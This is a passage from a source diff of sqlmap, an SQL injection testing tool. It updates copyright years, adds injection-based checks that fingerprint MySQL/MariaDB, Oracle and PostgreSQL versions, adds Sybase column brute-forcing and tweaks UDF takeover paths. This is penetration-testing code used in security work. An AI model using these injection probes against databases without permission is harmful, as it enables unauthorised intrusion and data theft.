(pymysql.OperationalError, pymysql.InternalError), msg: raise SqlmapConnectionException(msg[1]) + except struct.error, msg: + raise SqlmapConnectionException(msg) self.initCursor() self.printConnected() diff --git a/plugins/dbms/mysql/enumeration.py b/plugins/dbms/mysql/enumeration.py index 6480d9c7b..75e884c40 100644 --- a/plugins/dbms/mysql/enumeration.py +++ b/plugins/dbms/mysql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/filesystem.py b/plugins/dbms/mysql/filesystem.py index 1bfd8f621..6887e02ec 100644 --- a/plugins/dbms/mysql/filesystem.py +++ b/plugins/dbms/mysql/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index 700badb4f..b094a4fc8 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -10,14 +10,16 @@ import re from lib.core.common import Backend from lib.core.common import Format from lib.core.common import getUnicode +from lib.core.common import hashDBRetrieve +from lib.core.common import hashDBWrite from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import DBMS +from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS from lib.core.session import setDbms from lib.core.settings import MYSQL_ALIASES -from 
lib.core.settings import UNKNOWN_DBMS_VERSION from lib.request import inject from plugins.generic.fingerprint import Fingerprint as GenericFingerprint @@ -37,17 +39,18 @@ class Fingerprint(GenericFingerprint): return None - # MySQL valid versions updated on 04/2011 + # Reference: https://downloads.mysql.com/archives/community/ versions = ( (32200, 32235), # MySQL 3.22 (32300, 32359), # MySQL 3.23 (40000, 40032), # MySQL 4.0 (40100, 40131), # MySQL 4.1 - (50000, 50092), # MySQL 5.0 - (50100, 50156), # MySQL 5.1 + (50000, 50096), # MySQL 5.0 + (50100, 50172), # MySQL 5.1 (50400, 50404), # MySQL 5.4 - (50500, 50521), # MySQL 5.5 - (50600, 50604), # MySQL 5.6 + (50500, 50554), # MySQL 5.5 + (50600, 50635), # MySQL 5.6 + (50700, 50717), # MySQL 5.7 (60000, 60014), # MySQL 6.0 ) @@ -91,18 +94,22 @@ class Fingerprint(GenericFingerprint): value = "" wsOsFp = Format.getOs("web server", kb.headersFp) - if wsOsFp and not hasattr(conf, "api"): + if wsOsFp and not conf.api: value += "%s\n" % wsOsFp if kb.data.banner: dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - if dbmsOsFp and not hasattr(conf, "api"): + if dbmsOsFp and not conf.api: value += "%s\n" % dbmsOsFp value += "back-end DBMS: " actVer = Format.getDbms() + _ = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) + if _: + actVer += " (%s fork)" % _ + if not conf.extensiveFp: value += actVer return value @@ -142,15 +149,7 @@ class Fingerprint(GenericFingerprint): * http://dev.mysql.com/doc/refman/6.0/en/news-6-0-x.html (manual has been withdrawn) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(MYSQL_ALIASES) \ - or (conf.dbms or "").lower() in MYSQL_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - + if not conf.extensiveFp and Backend.isDbmsWithin(MYSQL_ALIASES): setDbms("%s %s" % (DBMS.MYSQL, Backend.getVersion())) if Backend.isVersionGreaterOrEqualThan("5"): @@ -169,7 +168,7 @@ class Fingerprint(GenericFingerprint): infoMsg = "confirming %s" % DBMS.MYSQL logger.info(infoMsg) - result = inject.checkBooleanExpression("USER() LIKE USER()") + result = inject.checkBooleanExpression("SESSION_USER() LIKE USER()") if not result: warnMsg = "the back-end DBMS is not %s" % DBMS.MYSQL @@ -177,6 +176,9 @@ class Fingerprint(GenericFingerprint): return False + if hashDBRetrieve(HASHDB_KEYS.DBMS_FORK) is None: + hashDBWrite(HASHDB_KEYS.DBMS_FORK, inject.checkBooleanExpression("VERSION() LIKE '%MariaDB%'") and "MariaDB" or "") + # reading information_schema on some platforms is causing annoying timeout exits # Reference: http://bugs.mysql.com/bug.php?id=15855 diff --git a/plugins/dbms/mysql/syntax.py b/plugins/dbms/mysql/syntax.py index e593a51fb..fb0df1a42 100644 --- a/plugins/dbms/mysql/syntax.py +++ b/plugins/dbms/mysql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/mysql/takeover.py b/plugins/dbms/mysql/takeover.py index 8d132fb60..07ed27e94 100644 --- a/plugins/dbms/mysql/takeover.py +++ b/plugins/dbms/mysql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -60,7 +60,7 @@ class 
Takeover(GenericTakeover): else: self.__plugindir = "%s/lib/mysql/plugin" % self.__basedir - self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) + self.__plugindir = ntToPosixSlashes(normalizePath(self.__plugindir)) or '.' self.udfRemoteFile = "%s/%s.%s" % (self.__plugindir, self.udfSharedLibName, self.udfSharedLibExt) @@ -74,7 +74,7 @@ class Takeover(GenericTakeover): # NOTE: specifying the relative path as './udf.dll' # saves in @@datadir on both MySQL 4.1 and MySQL 5.0 - self.__datadir = "." + self.__datadir = '.' self.__datadir = ntToPosixSlashes(normalizePath(self.__datadir)) # The DLL can be in either C:\WINDOWS, C:\WINDOWS\system, diff --git a/plugins/dbms/oracle/__init__.py b/plugins/dbms/oracle/__init__.py index 165f92702..94dde3987 100644 --- a/plugins/dbms/oracle/__init__.py +++ b/plugins/dbms/oracle/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/connector.py b/plugins/dbms/oracle/connector.py index 3777689f4..5117f9d20 100644 --- a/plugins/dbms/oracle/connector.py +++ b/plugins/dbms/oracle/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/enumeration.py b/plugins/dbms/oracle/enumeration.py index b9318d17f..0cc0059c7 100644 --- a/plugins/dbms/oracle/enumeration.py +++ b/plugins/dbms/oracle/enumeration.py @@ -1,11 +1,10 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import getLimitRange from lib.core.common import isAdminFromPrivileges from lib.core.common import isInferenceAvailable @@ -17,6 +16,7 @@ from lib.core.data import kb from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException @@ -30,7 +30,7 @@ class Enumeration(GenericEnumeration): def getRoles(self, query2=False): infoMsg = "fetching database users roles" - rootQuery = queries[Backend.getIdentifiedDbms()].roles + rootQuery = queries[DBMS.ORACLE].roles if conf.user == "CU": infoMsg += " for current user" @@ -50,7 +50,7 @@ class Enumeration(GenericEnumeration): condition = rootQuery.inband.condition if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) @@ -86,7 +86,7 @@ class Enumeration(GenericEnumeration): if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct: if conf.user: - users = conf.user.split(",") + users = conf.user.split(',') else: if not len(kb.data.cachedUsers): users = self.getUsers() diff --git a/plugins/dbms/oracle/filesystem.py b/plugins/dbms/oracle/filesystem.py index 0428e3fdb..a4678d9aa 100644 --- a/plugins/dbms/oracle/filesystem.py +++ b/plugins/dbms/oracle/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 
+Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 4b56b3122..fbcc7aae7 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -58,7 +58,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(ORACLE_ALIASES) or (conf.dbms or "").lower() in ORACLE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES): setDbms(DBMS.ORACLE) self.getBanner() @@ -102,7 +102,8 @@ class Fingerprint(GenericFingerprint): infoMsg = "actively fingerprinting %s" % DBMS.ORACLE logger.info(infoMsg) - for version in ("11i", "10g", "9i", "8i"): + # Reference: https://en.wikipedia.org/wiki/Oracle_Database + for version in ("12c", "11g", "10g", "9i", "8i"): number = int(re.search("([\d]+)", version).group(1)) output = inject.checkBooleanExpression("%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)" % (number, 1 if number < 10 else 2)) diff --git a/plugins/dbms/oracle/syntax.py b/plugins/dbms/oracle/syntax.py index 41d2e9df5..2a2419f91 100644 --- a/plugins/dbms/oracle/syntax.py +++ b/plugins/dbms/oracle/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/oracle/takeover.py b/plugins/dbms/oracle/takeover.py index 1781cd9e0..7258cb9f9 100644 --- a/plugins/dbms/oracle/takeover.py +++ b/plugins/dbms/oracle/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/__init__.py b/plugins/dbms/postgresql/__init__.py index 561b13572..4386624b9 100644 --- a/plugins/dbms/postgresql/__init__.py +++ b/plugins/dbms/postgresql/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/connector.py b/plugins/dbms/postgresql/connector.py index e60e7777a..8eb9c283c 100644 --- a/plugins/dbms/postgresql/connector.py +++ b/plugins/dbms/postgresql/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/enumeration.py b/plugins/dbms/postgresql/enumeration.py index d379c2512..220e80238 100644 --- a/plugins/dbms/postgresql/enumeration.py +++ b/plugins/dbms/postgresql/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/filesystem.py 
b/plugins/dbms/postgresql/filesystem.py index 72cf7c75f..a8a559cad 100644 --- a/plugins/dbms/postgresql/filesystem.py +++ b/plugins/dbms/postgresql/filesystem.py @@ -1,14 +1,13 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os from lib.core.common import randomInt -from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapUnsupportedFeatureException from lib.core.settings import LOBLKSIZE diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 3391f711e..c40ffbc0c 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -63,7 +63,7 @@ class Fingerprint(GenericFingerprint): * http://www.postgresql.org/docs/9.1/interactive/release.html (up to 9.1.3) """ - if not conf.extensiveFp and (Backend.isDbmsWithin(PGSQL_ALIASES) or (conf.dbms or "").lower() in PGSQL_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES): setDbms(DBMS.PGSQL) self.getBanner() @@ -97,8 +97,16 @@ class Fingerprint(GenericFingerprint): infoMsg = "actively fingerprinting %s" % DBMS.PGSQL logger.info(infoMsg) - if inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): - Backend.setVersion(">= 9.1.0") + if inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"): + Backend.setVersion(">= 9.5.0") + elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"): + Backend.setVersionList([">= 9.4.0", "< 9.5.0"]) + elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"): + Backend.setVersionList([">= 9.3.0", "< 9.4.0"]) + elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"): + Backend.setVersionList([">= 9.2.0", "< 9.3.0"]) + elif inject.checkBooleanExpression("REVERSE('sqlmap')='pamlqs'"): + Backend.setVersionList([">= 9.1.0", "< 9.2.0"]) elif inject.checkBooleanExpression("LENGTH(TO_CHAR(1,'EEEE'))>0"): Backend.setVersionList([">= 9.0.0", "< 9.1.0"]) elif inject.checkBooleanExpression("2=(SELECT DIV(6,3))"): diff --git a/plugins/dbms/postgresql/syntax.py b/plugins/dbms/postgresql/syntax.py index 7bb904625..07d972fd8 100644 --- a/plugins/dbms/postgresql/syntax.py +++ b/plugins/dbms/postgresql/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/postgresql/takeover.py b/plugins/dbms/postgresql/takeover.py index 0e4794acd..5090f4f9d 100644 --- a/plugins/dbms/postgresql/takeover.py +++ b/plugins/dbms/postgresql/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -48,7 +48,13 @@ class Takeover(GenericTakeover): banVer = kb.bannerFp["dbmsVersion"] - if banVer >= "9.1": + if banVer >= "9.4": + majorVer = "9.4" + elif banVer >= "9.3": + majorVer = "9.3" + elif banVer >= "9.2": + majorVer = "9.2" + elif banVer >= "9.1": majorVer = "9.1" elif banVer >= "9.0": majorVer = "9.0" diff --git 
a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py index 0f7dcab83..61cd955ce 100644 --- a/plugins/dbms/sqlite/__init__.py +++ b/plugins/dbms/sqlite/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py index dae2a3e78..dcb21072a 100644 --- a/plugins/dbms/sqlite/connector.py +++ b/plugins/dbms/sqlite/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py index db1d3c954..a9d8295e9 100644 --- a/plugins/dbms/sqlite/enumeration.py +++ b/plugins/dbms/sqlite/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py index ed1e5c152..55352b5be 100644 --- a/plugins/dbms/sqlite/filesystem.py +++ b/plugins/dbms/sqlite/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 6c42a6374..35b8eeb76 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -64,7 +64,7 @@ class Fingerprint(GenericFingerprint): * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions """ - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES): + if not conf.extensiveFp and Backend.isDbmsWithin(SQLITE_ALIASES): setDbms(DBMS.SQLITE) self.getBanner() diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py index 53c54f9f6..8728c7b62 100644 --- a/plugins/dbms/sqlite/syntax.py +++ b/plugins/dbms/sqlite/syntax.py @@ -1,13 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import binascii -from lib.core.common import Backend from lib.core.common import isDBMSVersionAtLeast from lib.core.settings import UNICODE_ENCODING from plugins.generic.syntax import Syntax as GenericSyntax @@ -19,6 +18,7 @@ class Syntax(GenericSyntax): @staticmethod def escape(expression, quote=True): """ + >>> from lib.core.common import Backend >>> Backend.setVersion('2') ['2'] >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py index 65fe09792..30ab0c4d0 100644 --- a/plugins/dbms/sqlite/takeover.py +++ b/plugins/dbms/sqlite/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers 
(http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py index b2df16926..a315df108 100644 --- a/plugins/dbms/sybase/__init__.py +++ b/plugins/dbms/sybase/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py index 3b1c7be75..6439a468e 100644 --- a/plugins/dbms/sybase/connector.py +++ b/plugins/dbms/sybase/connector.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -41,7 +41,7 @@ class Connector(GenericConnector): try: self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except pymssql.OperationalError, msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: raise SqlmapConnectionException(msg) self.initCursor() @@ -50,7 +50,7 @@ class Connector(GenericConnector): def fetchall(self): try: return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: + except (pymssql.Error, _mssql.MssqlDatabaseException), msg: logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) return None diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py index 09a0356af..98c025932 100644 --- a/plugins/dbms/sybase/enumeration.py +++ b/plugins/dbms/sybase/enumeration.py @@ -1,26 +1,30 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ -from lib.core.common import Backend from lib.core.common import filterPairValues from lib.core.common import isTechniqueAvailable from lib.core.common import randomStr +from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import paths from lib.core.data import queries from lib.core.dicts import SYBASE_TYPES +from lib.core.enums import DBMS from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException +from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.utils.brute import columnExists from lib.utils.pivotdumptable import pivotDumpTable from plugins.generic.enumeration import Enumeration as GenericEnumeration @@ -32,7 +36,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching database users" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].users + rootQuery = queries[DBMS.SYBASE].users randStr = randomStr() query = rootQuery.inband.query @@ -89,7 +93,7 @@ class Enumeration(GenericEnumeration): infoMsg = "fetching 
database names" logger.info(infoMsg) - rootQuery = queries[Backend.getIdentifiedDbms()].dbs + rootQuery = queries[DBMS.SYBASE].dbs randStr = randomStr() query = rootQuery.inband.query @@ -120,7 +124,7 @@ class Enumeration(GenericEnumeration): conf.db = self.getCurrentDb() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() @@ -138,7 +142,7 @@ class Enumeration(GenericEnumeration): else: blinds = [True] - rootQuery = queries[Backend.getIdentifiedDbms()].tables + rootQuery = queries[DBMS.SYBASE].tables for db in dbs: for blind in blinds: @@ -159,7 +163,7 @@ class Enumeration(GenericEnumeration): return kb.data.cachedTables - def getColumns(self, onlyColNames=False): + def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: @@ -180,7 +184,7 @@ class Enumeration(GenericEnumeration): conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: - colList = conf.col.split(",") + colList = conf.col.split(',') else: colList = [] @@ -191,7 +195,7 @@ class Enumeration(GenericEnumeration): colList[colList.index(col)] = safeSQLIdentificatorNaming(col) if conf.tbl: - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') else: self.getTables() @@ -208,7 +212,44 @@ class Enumeration(GenericEnumeration): for tbl in tblList: tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) - rootQuery = queries[Backend.getIdentifiedDbms()].columns + if bruteForce: + resumeAvailable = False + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + resumeAvailable = True + break + + if resumeAvailable and not conf.freshQueries or colList: + columns = {} + + for column in colList: + columns[column] = None + + for tbl in tblList: + for db, table, colName, colType in kb.brute.columns: + if db == conf.db and table == tbl: + columns[colName] = colType + + if conf.db in kb.data.cachedColumns: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns + else: + kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} + + return kb.data.cachedColumns + + message = "do you want to use common column existence check? 
[y/N/q] " + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() + + if choice == 'N': + return + elif choice == 'Q': + raise SqlmapUserQuitException + else: + return columnExists(paths.COMMON_COLUMNS) + + rootQuery = queries[DBMS.SYBASE].columns if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = [False, True] @@ -225,7 +266,7 @@ class Enumeration(GenericEnumeration): return {conf.db: kb.data.cachedColumns[conf.db]} - if colList: + if dumpMode and colList: table = {} table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table @@ -246,7 +287,7 @@ class Enumeration(GenericEnumeration): columns = {} for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(type_, type_) + columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) table[safeSQLIdentificatorNaming(tbl)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py index c5dbc6943..1cd407e00 100644 --- a/plugins/dbms/sybase/filesystem.py +++ b/plugins/dbms/sybase/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index 762ab95eb..919f64ce6 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -58,9 +58,7 @@ class Fingerprint(GenericFingerprint): return value def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): + if not conf.extensiveFp and Backend.isDbmsWithin(SYBASE_ALIASES): setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) self.getBanner() diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py index a0f1775d4..3e1d10ac2 100644 --- a/plugins/dbms/sybase/syntax.py +++ b/plugins/dbms/sybase/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/dbms/sybase/takeover.py b/plugins/dbms/sybase/takeover.py index 9a9dfd7c4..90c4d7270 100644 --- a/plugins/dbms/sybase/takeover.py +++ b/plugins/dbms/sybase/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 8d7bcd8f0..942d54d8f 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) 
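The Sybase getColumns hunk above normalizes usertype values that may arrive as numeric strings before consulting SYBASE_TYPES. A standalone sketch of that key normalization; the code/name pairs below are an assumed subset for illustration, not the real SYBASE_TYPES dictionary:

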